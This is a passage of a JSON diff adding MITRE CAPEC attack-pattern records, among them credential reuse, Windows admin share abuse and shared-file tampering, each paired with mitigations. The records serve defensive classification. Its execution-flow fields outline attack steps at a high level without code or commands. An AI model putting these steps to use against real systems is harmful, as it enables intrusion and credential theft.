"external_id": "REF-462", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--7a6e0e5c-f18e-4612-aaa6-68bdeb378b31", + "modified": "2017-01-12T00:00:00.000Z", + "name": "Orbital Jamming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7534fc4c-f683-4918-8f62-005e0402d18a" + ], + "x_capec_consequences": { + "Availability": [ + "Other (A successful attack will deny the availability of the satellite communications for authorized users.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "This attack requires the knowledge of the satellite's coordinates for targeting." + ], + "x_capec_resources_required": [ + "A satellite uplink station." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-207 : Removing Important Client Functionality. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-56", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/56.html" + } + ], + "id": "attack-pattern--86daf34c-5e2b-49d7-b579-cfde98c462ac", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Removing/short-circuiting 'guard logic'", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary guesses or obtains (i.e. steals or purchases) legitimate credentials (e.g. userID/password) to achieve authentication and to perform authorized actions under the guise of an authenticated user or service.\n ", + "external_references": [ + { + "external_id": "CAPEC-560", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/560.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-1273", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1273.html" + }, + { + "description": "Valid Accounts", + "external_id": "T1078", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1078" + }, + { + "description": "Attractive Accounts for Credential Theft, 2017--05---31, Microsoft Corporation", + "external_id": "REF-570", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/attractive-accounts-for-credential-theft?redirectedfrom=MSDN" + }, + { + "description": "Feike Hacquebord, Two Years of Pawn Storm: Examining an Increasingly Relevant Threat, 2017--04---25, Trend Micro", + "external_id": "REF-571", + "source_name": "reference_from_CAPEC", + "url": "https://documents.trendmicro.com/assets/wp/wp-two-years-of-pawn-storm.pdf" + }, + { + "description": "Corporate IoT – a path to intrusion, 2019--10---05, Microsoft Security Response Center (MSRC)", + "external_id": "REF-572", + "source_name": "reference_from_CAPEC", + "url": "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion" + }, + { + "description": "Brendan McKeague, Van Ta, Ben Fedore, Geoff Ackerman, Alex Pennino, Andrew Thompson, Douglas Bienstock, Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware, 2019--04---05, Microsoft Security Response Center (MSRC)", + "external_id": "REF-573", + "source_name": "reference_from_CAPEC", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html" + } + ], + "id": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Use of Known Domain Credentials", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--c2a87533-3c81-40b3-b529-9560c644f70d", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--a4986dd8-cb9c-45cb-bb53-b7549f2b8d62", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "Throughout 2015 and 2016, APT28 — also known as Pawn Storm, Sednit, Fancy Bear, Sofacy, and STRONTIUM — leveraged stolen credentials to infiltrate the Democratic National Committee (DNC), the United States Army, the World Anti-Doping Agency (WADA), the Court of Arbitration for Sport (TAS-CAS), and more. In most cases, the legitimate credentials were obtained via calculated spearphishing, tabnabbing, and DNS attacks targeted at corporate webmail systems. APT28 also executed several watering hole attacks, in addition to exploiting several zero-day vulnerabilities within Flash and Windows. The stolen credentials were then utilized to maintain authenticated access, laterally move within the local network, and exfiltrate sensitive information including DNC emails and personal medical records of numerous athletes. [REF-571]", + "In early 2019, FIN6 exploited stolen credentials from an organization within the engineering industry to laterally move within an environment via the Windows’ Remote Desktop Protocol (RDP). Multiple servers were subsequently infected with malware to create malware distribution servers, which were used to distribute the LockerGoga ransomware. [REF-573]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known credentials: The adversary must obtain known credentials in order to access the target system, application, or service.

    2. Techniques
    An adversary purchases breached username/password combinations or leaked hashed passwords from the dark web.
    An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.
    An adversary conducts a sniffing attack to steal credentials as they are transmitted.
    An adversary gains access to a database and exfiltrates password hashes.
    An adversary examines outward-facing configuration and properties files to discover hardcoded credentials.

  2. Determine target's password policy: Determine the password policies of the target system/application to determine if the known credentials fit within the specified criteria.

    3. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks if multiple passwords are known for a single user account).

Experiment

  1. Attempt authentication: Try each credential until the target grants access.

    2. Techniques
    Manually or automatically enter each credential through the target's interface.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within a system or application

  2. Spoofing: Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within the system or application.

", + "x_capec_extended_description": "\n Attacks leveraging trusted credentials typically result in the adversary laterally moving within the local network, since users are often allowed to login to systems/applications within the network using the same password. This further allows the adversary to obtain sensitive data, download/install malware on the system, pose as a legitimate user for social engineering purposes, and more.\n Attacks on known passwords generally rely on the primary fact that users often reuse the same username/password combination for a variety of systems, applications, and services, coupled with poor password policies on the target system or application. Adversaries can also utilize known passwords to target Single Sign On (SSO) or cloud-based applications and services, which often don't verify the authenticity of the user's input. Known credentials are usually obtained by an adversary via a system/application breach and/or by purchasing dumps of credentials on the dark web. These credentials may be further gleaned via exposed configuration and properties files that contain system passwords, database connection strings, and other sensitive data.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--06e8782a-87af-4863-b6b1-99e09edda3be", + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--755bb5ac-2eee-4e54-9864-92812666120c", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_prerequisites": [ + "The system/application uses one factor password based authentication, SSO, and/or cloud-based authentication.", + "The system/application does not have a sound password policy that is being enforced.", + "The system/application does not implement an effective password throttling mechanism.", + "The adversary possesses a list of known user accounts and corresponding passwords that may exist on the target." + ], + "x_capec_resources_required": [ + "A list of known credentials.", + "A custom script that leverages the credential list to launch an attack." + ], + "x_capec_skills_required": { + "Low": "Once an adversary obtains a known credential, leveraging it is trivial." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage multi-factor authentication for all authentication services and prior to granting an entity access to the domain network.", + "id": "course-of-action--b8f274c3-95ed-4968-afdc-6a8a87a6fb19", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-560-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e3e578d6-8b57-4c74-a939-800e0cf7a45b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8f274c3-95ed-4968-afdc-6a8a87a6fb19", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6395a05b-7097-429d-878c-c8c1f5d4beb4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure users are not reusing username/password combinations for multiple systems, applications, or services.", + "id": "course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-560-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--00382075-fd38-4145-ac07-88fa46ab5e82", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f17a2576-00f1-49a8-b554-5ec205ca54a2", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not reuse local administrator account credentials across systems.", + "id": "course-of-action--7c813ade-2f68-46ad-b0ff-b3aa1d6f16d0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-560-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8e80f453-8c74-45c3-ad17-5cceded60e65", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c813ade-2f68-46ad-b0ff-b3aa1d6f16d0", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Deny remote use of local admin credentials to log into domain systems.", + "id": "course-of-action--8e39cc3a-64c4-488e-84a3-e2613bdb1254", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-560-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5d4dbec9-a56a-4a81-9a64-a9d70c3cdcac", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8e39cc3a-64c4-488e-84a3-e2613bdb1254", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not allow accounts to be a local administrator on more than one system.", + "id": "course-of-action--9d97f821-8b04-46bf-a725-33db09a739da", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-560-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c44dcaf3-84a3-4fc1-a9c4-3c1c06dbeac1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9d97f821-8b04-46bf-a725-33db09a739da", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--44f48a42-3c74-4fbb-885b-d16e52d1e21f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36387909-c46a-4d0f-8954-bbc4c954c9a9", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor system and domain logs for abnormal credential access.", + "id": "course-of-action--ab6c4df3-7bf9-4fdd-8c2a-9055c0aea441", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-560-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6871bf92-f743-4558-b1fd-ca894de9bb78", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab6c4df3-7bf9-4fdd-8c2a-9055c0aea441", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary guesses or obtains (i.e. steals or purchases) legitimate Windows administrator credentials (e.g. userID/password) to access Windows Admin Shares on a local machine or within a Windows domain.", + "external_references": [ + { + "external_id": "CAPEC-561", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/561.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "description": "Remote Services:SMB/Windows Admin Shares", + "external_id": "T1021.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1021/002" + }, + { + "description": "Overview of problems that may occur when administrative shares are missing, 2017--03---13, Microsoft Corporation", + "external_id": "REF-577", + "source_name": "reference_from_CAPEC", + "url": "https://support.microsoft.com/en-us/help/842715/overview-of-problems-that-may-occur-when-administrative-shares-are-mis" + }, + { + "description": "Rob Smallridge, HAPT15 is alive and strong: An analysis of RoyalCli and RoyalDNS, 2018--03---10, NCC Group", + "external_id": "REF-578", + "source_name": "reference_from_CAPEC", + "url": "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" + }, + { + "description": "Assaf Dahan, Operation Cobalt Kitty: Cybereason Labs Analysis, 2017, CyberReason", + "external_id": "REF-579", + "source_name": "reference_from_CAPEC", + "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf" + } + ], + "id": "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Windows Admin Shares with Stolen Credentials", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "attack-pattern--9d08b257-08f6-42e3-ad7e-41aaf07789a1", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3", + "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "APT32 has leveraged Windows' built-in Net utility to use Windows Administrative Shares to copy and execute remote malware. [REF-579]", + "In May 2017, APT15 laterally moved within a Windows domain via Windows Administrative Shares to copy files to and from compromised host systems. This further allowed for the remote execution of malware. [REF-578]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known Windows administrator credentials: The adversary must obtain known Windows administrator credentials in order to access the administrative network shares.

    2. Techniques
    An adversary purchases breached Windows administrator credentials from the dark web.
    An adversary leverages a key logger or phishing attack to steal administrator credentials as they are provided.
    An adversary conducts a sniffing attack to steal Windows administrator credentials as they are transmitted.
    An adversary gains access to a Windows domain system/files and exfiltrates Windows administrator password hashes.
    An adversary examines outward-facing configuration and properties files to discover hardcoded Windows administrator credentials.

Experiment

  1. Attempt domain authentication: Try each Windows administrator credential against the hidden network shares until the target grants access.

    2. Techniques
    Manually or automatically enter each administrator credential through the target's interface.

Exploit

  1. Malware Execution: An adversary can remotely execute malware within the administrative network shares to infect other systems within the domain.

  2. Data Exfiltration: The adversary can remotely obtain sensitive data contained within the administrative network shares.

", + "x_capec_extended_description": "\n Windows systems within the Windows NT family contain hidden network shares that are only accessible to system administrators. These shares allow administrators to remotely access all disk volumes on a network-connected system and further allow for files to be copied, written, and executed, along with other administrative actions. Example network shares include: C$, ADMIN$ and IPC$. If an adversary is able to obtain legitimate Windows credentials, the hidden shares can be accessed remotely, via server message block (SMB) or the Net utility, to transfer files and execute code. It is also possible for adversaries to utilize NTLM hashes to access administrator shares on systems with certain configuration and patch levels.\n ", + "x_capec_prerequisites": [ + "The system/application is connected to the Windows domain.", + "The target administrative share allows remote use of local admin credentials to log into domain systems.", + "The adversary possesses a list of known Windows administrator credentials that exist on the target domain." + ], + "x_capec_resources_required": [ + "A list of known Windows administrator credentials for the targeted domain." + ], + "x_capec_skills_required": { + "Low": "Once an adversary obtains a known Windows credential, leveraging it is trivial." + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eecc445b-fbb2-4188-870d-159485c94ef0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c813ade-2f68-46ad-b0ff-b3aa1d6f16d0", + "target_ref": "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--11eaef47-9b8a-4bb8-bf2f-63eb95d12037", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8e39cc3a-64c4-488e-84a3-e2613bdb1254", + "target_ref": "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f482b089-26b2-468c-8161-bd9eea7cfe4b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9d97f821-8b04-46bf-a725-33db09a739da", + "target_ref": "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates the files in a shared location by adding malicious programs, scripts, or exploit code to valid content. Once a user opens the shared content, the tainted content is executed.", + "external_references": [ + { + "external_id": "CAPEC-562", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/562.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Taint shared content", + "external_id": "T1080", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1080" + } + ], + "id": "attack-pattern--9d076056-3719-4afc-94f4-5d16aaee50a3", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Modify Shared File", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Disallow shared content. Protect shared folders by minimizing users that have write access. Use utilities that mitigate exploitation like the Microsoft Enhanced Mitigation Experience Toolkit (EMET) to prevent exploits from being run.", + "id": "course-of-action--7c8c48ad-29e9-48a7-803e-dd6994eed5fd", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-562-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--48a3e4bb-b139-4cfd-ad9b-bcafd4087f57", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c8c48ad-29e9-48a7-803e-dd6994eed5fd", + "target_ref": "attack-pattern--9d076056-3719-4afc-94f4-5d16aaee50a3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversaries may add malicious content to a website through the open file share and then browse to that content with a web browser to cause the server to execute the content. The malicious content will typically run under the context and permissions of the web server process, often resulting in local system or administrative privileges depending on how the web server is configured.", + "external_references": [ + { + "external_id": "CAPEC-563", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/563.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + } + ], + "id": "attack-pattern--80604cc1-88b5-4e55-846e-01cfc67966b2", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Add Malicious File to Shared Webroot", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure proper permissions on directories that are accessible through a web server. Disallow remote access to the web root. Disable execution on directories within the web root. Ensure that permissions of the web server process are only what is required by not using built-in accounts and instead create specific accounts to limit unnecessary access or permissions overlap across multiple systems.", + "id": "course-of-action--fa8958ed-8fb1-4412-9a43-882a8093afba", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-563-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fac83968-b4fb-49f5-b904-487038f291fe", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fa8958ed-8fb1-4412-9a43-882a8093afba", + "target_ref": "attack-pattern--80604cc1-88b5-4e55-846e-01cfc67966b2", + "type": 